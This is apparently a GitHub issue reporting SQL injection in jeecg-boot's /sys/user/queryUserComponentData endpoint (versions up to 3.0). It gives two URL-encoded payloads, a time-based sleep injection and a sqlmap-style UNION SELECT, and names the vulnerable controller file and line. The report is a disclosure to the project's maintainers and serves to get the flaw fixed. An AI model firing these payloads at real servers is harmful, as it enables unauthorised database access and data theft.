Skip to content

SQL injection exists in /sys/user/queryUserComponentData #3348

Closed
@jinnywc

Description

@jinnywc
版本号:

jeecg-boot<=3.0

问题描述:

After testing, it is found that the code parameter of /sys/user/queryUserComponentData interface of jeecg-boot has SQL injection

Reuse https://github.com/jeecgboot/jeecg-boot After the source code of the project starts the project, click "custom component" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection

截图&代码:

payload:
/jeecg-boot/sys/user/queryUserComponentData?_t=1641263644&pageNo=1&pageSize=10&departId=5159cde220114246b045e574adceafe9&realname=admin&username=%61%64%6d%69%6e%27%20%61%6e%64%20%28%73%65%6c%65%63%74%20%39%33%36%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%28%73%6c%65%65%70%28%35%29%29%29%6f%46%78%55%29%2d%2d%20
1

or
/jeecg-boot/sys/user/queryUserComponentData?_t=1641263644&pageNo=1&pageSize=10&departId=5159cde220114246b045e574adceafe9&realname=%61%64%6d%69%6e%27%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%4f%4e%43%41%54%28%30%78%37%31%36%61%37%30%36%32%37%31%2c%30%78%37%37%34%63%37%30%34%39%34%61%34%39%35%37%34%64%35%36%35%39%36%63%36%39%35%30%34%66%34%65%35%34%36%32%36%33%35%39%34%35%36%63%36%36%35%61%35%36%35%37%34%38%35%34%35%34%37%61%36%31%37%37%35%37%37%30%34%33%36%39%34%31%36%64%34%61%34%31%36%37%2c%30%78%37%31%36%62%37%31%37%31%37%31%29%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2d%2d%20%2d0&username=zz12

2
Using sqlmap
3
The vulnerability code exists in the following code:\jeecg-boot\jeecg-boot-module-system\src\main\java\org\jeecg\modules\system\controller\SysUserController.java At line 402 of
4
5
6

友情提示(为了提高issue处理效率):

  • 未按格式要求发帖,会被直接删掉;
  • 请自己初判问题描述是否清楚,是否方便我们调查处理;
  • 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
  • 描述过于简单或模糊,导致无法处理的,会被直接删掉;

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions